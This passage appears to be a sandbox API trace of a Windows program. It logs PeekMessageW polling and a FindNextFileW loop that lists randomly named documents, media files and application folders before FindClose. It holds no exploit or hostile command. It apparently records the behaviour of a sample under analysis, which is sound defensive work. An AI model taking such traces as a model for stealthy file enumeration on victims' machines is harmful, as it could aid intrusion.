returned 1 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x52df5e90, ftCreationTime.dwHighDateTime=0x1d4c7dc, ftLastAccessTime.dwLowDateTime=0xdf24fe70, ftLastAccessTime.dwHighDateTime=0x1d4d22a, ftLastWriteTime.dwLowDateTime=0xdf24fe70, ftLastWriteTime.dwHighDateTime=0x1d4d22a, nFileSizeHigh=0x0, nFileSizeLow=0x1a51, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="JLaCurEw.pdf", cAlternateFileName="")) returned 1 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.519] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3cb5d5a0, ftCreationTime.dwHighDateTime=0x1d4d4f6, ftLastAccessTime.dwLowDateTime=0x10645790, ftLastAccessTime.dwHighDateTime=0x1d4d174, ftLastWriteTime.dwLowDateTime=0x10645790, ftLastWriteTime.dwHighDateTime=0x1d4d174, nFileSizeHigh=0x0, nFileSizeLow=0x131aa, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="jOF28qdC.m4a", cAlternateFileName="")) returned 1 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20c504d0, ftCreationTime.dwHighDateTime=0x1d4cd1f, ftLastAccessTime.dwLowDateTime=0x89e0af20, ftLastAccessTime.dwHighDateTime=0x1d4d033, ftLastWriteTime.dwLowDateTime=0x89e0af20, ftLastWriteTime.dwHighDateTime=0x1d4d033, nFileSizeHigh=0x0, nFileSizeLow=0x10dbe, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="k3zAUT-8EHVGD9wmf.mp3", cAlternateFileName="K3ZAUT~1.MP3")) returned 1 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.520] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6b695060, ftCreationTime.dwHighDateTime=0x1d2dda5, ftLastAccessTime.dwLowDateTime=0x6b695060, ftLastAccessTime.dwHighDateTime=0x1d2dda5, ftLastWriteTime.dwLowDateTime=0x6b695060, ftLastWriteTime.dwHighDateTime=0x1d2dda5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="Macromedia", cAlternateFileName="MACROM~1")) returned 1 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x8d940a0, ftLastAccessTime.dwHighDateTime=0x1d305fe, ftLastWriteTime.dwLowDateTime=0x8d940a0, ftLastWriteTime.dwHighDateTime=0x1d305fe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9bd0, dwReserved1=0x25c6e50, cFileName="Microsoft", cAlternateFileName="MICROS~1")) returned 1 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.521] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbbeeb20, ftCreationTime.dwHighDateTime=0x1d4c541, ftLastAccessTime.dwLowDateTime=0x7bcd98d0, ftLastAccessTime.dwHighDateTime=0x1d4ca6b, ftLastWriteTime.dwLowDateTime=0x7bcd98d0, ftLastWriteTime.dwHighDateTime=0x1d4ca6b, nFileSizeHigh=0x0, nFileSizeLow=0xb5e0, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="ngBTzibcz-Ml b.gif", cAlternateFileName="NGBTZI~1.GIF")) returned 1 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb8167bd0, ftCreationTime.dwHighDateTime=0x1d4c968, ftLastAccessTime.dwLowDateTime=0x87eb4c50, ftLastAccessTime.dwHighDateTime=0x1d4d558, ftLastWriteTime.dwLowDateTime=0x87eb4c50, ftLastWriteTime.dwHighDateTime=0x1d4d558, nFileSizeHigh=0x0, nFileSizeLow=0x16b6c, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="OjU _gfFJ vK4z9.pptx", cAlternateFileName="OJU_GF~1.PPT")) returned 1 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fc02520, ftCreationTime.dwHighDateTime=0x1d4d281, ftLastAccessTime.dwLowDateTime=0xbd7fbdf0, ftLastAccessTime.dwHighDateTime=0x1d4ce2e, ftLastWriteTime.dwLowDateTime=0xbd7fbdf0, ftLastWriteTime.dwHighDateTime=0x1d4ce2e, nFileSizeHigh=0x0, nFileSizeLow=0x17426, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="qN0j1jGF7bK.jpg", cAlternateFileName="QN0J1J~1.JPG")) returned 1 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.522] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x1d1a4a40, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0xc07d4420, ftLastAccessTime.dwHighDateTime=0x1d4d06b, ftLastWriteTime.dwLowDateTime=0xc07d4420, ftLastWriteTime.dwHighDateTime=0x1d4d06b, nFileSizeHigh=0x0, nFileSizeLow=0x7e14, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="qtQYu5s9c3vFJHOzQ.csv", cAlternateFileName="QTQYU5~1.CSV")) returned 1 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6d360f20, ftCreationTime.dwHighDateTime=0x1d4cffa, ftLastAccessTime.dwLowDateTime=0x3a8e6870, ftLastAccessTime.dwHighDateTime=0x1d4c766, ftLastWriteTime.dwLowDateTime=0x3a8e6870, ftLastWriteTime.dwHighDateTime=0x1d4c766, nFileSizeHigh=0x0, nFileSizeLow=0xf2fd, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="UEbu8HvUsrKZg-ZGj.m4a", cAlternateFileName="UEBU8H~1.M4A")) returned 1 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.523] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcb5d5ab0, ftCreationTime.dwHighDateTime=0x1d4d0e8, ftLastAccessTime.dwLowDateTime=0x6e122060, ftLastAccessTime.dwHighDateTime=0x1d4d080, ftLastWriteTime.dwLowDateTime=0x6e122060, ftLastWriteTime.dwHighDateTime=0x1d4d080, nFileSizeHigh=0x0, nFileSizeLow=0x17d25, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="uKUOp3ady.png", cAlternateFileName="UKUOP3~1.PNG")) returned 1 [0190.523] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e6aa90, ftCreationTime.dwHighDateTime=0x1d4cd39, ftLastAccessTime.dwLowDateTime=0xe61ff240, ftLastAccessTime.dwHighDateTime=0x1d4d3bd, ftLastWriteTime.dwLowDateTime=0xe61ff240, ftLastWriteTime.dwHighDateTime=0x1d4d3bd, nFileSizeHigh=0x0, nFileSizeLow=0x12283, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="USOrj0U79kg56B_MZLC3.gif", cAlternateFileName="USORJ0~1.GIF")) returned 1 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4a579e30, ftCreationTime.dwHighDateTime=0x1d4ccb5, ftLastAccessTime.dwLowDateTime=0x99b27a90, ftLastAccessTime.dwHighDateTime=0x1d4d539, ftLastWriteTime.dwLowDateTime=0x99b27a90, ftLastWriteTime.dwHighDateTime=0x1d4d539, nFileSizeHigh=0x0, nFileSizeLow=0x109f6, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="yI2BOQ.jpg", cAlternateFileName="")) returned 1 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.524] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xf8fec4c0, ftCreationTime.dwHighDateTime=0x1d4cbcc, ftLastAccessTime.dwLowDateTime=0xe923c630, ftLastAccessTime.dwHighDateTime=0x1d4d59b, ftLastWriteTime.dwLowDateTime=0xe923c630, ftLastWriteTime.dwHighDateTime=0x1d4d59b, nFileSizeHigh=0x0, nFileSizeLow=0xf044, dwReserved0=0x24aca50, dwReserved1=0x25c6e50, cFileName="ynNikGKB3oJVJW2VhiLE.ots", cAlternateFileName="YNNIKG~1.OTS")) returned 1 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x87149050, ftCreationTime.dwHighDateTime=0x1d4c7ef, ftLastAccessTime.dwLowDateTime=0x86cd5b30, ftLastAccessTime.dwHighDateTime=0x1d4d542, ftLastWriteTime.dwLowDateTime=0x86cd5b30, ftLastWriteTime.dwHighDateTime=0x1d4d542, nFileSizeHigh=0x0, nFileSizeLow=0x2427, dwReserved0=0x24aa908, dwReserved1=0x25c6e50, cFileName="_J3DS1U3FLV.mp3", cAlternateFileName="_J3DS1~1.MP3")) returned 1 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.525] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf218 | out: lpFindFileData=0x8bf218*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x25c6d68, ftCreationTime.dwHighDateTime=0x25c6a58, ftLastAccessTime.dwLowDateTime=0x10, ftLastAccessTime.dwHighDateTime=0x24b1438, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x240d650, nFileSizeHigh=0x25c6a58, nFileSizeLow=0x25c6b70, dwReserved0=0x24a9b40, dwReserved1=0x25c6e50, cFileName="\x25b9\x34\xf1dc\x8b\x74cb", cAlternateFileName="\x8e1a\x40\x8154\x241\xf47c\x8b\x8614\x4a\x3cfb\x40\x8178\x4a\xf580\x8b\xf484\x8b\x3d76\x40\xf4a0\x8b\xf580\x8b\x85f4\x4a\x61")) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0190.526] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf620, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf620) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.526] PeekMessageW (in: lpMsg=0x8bf970, 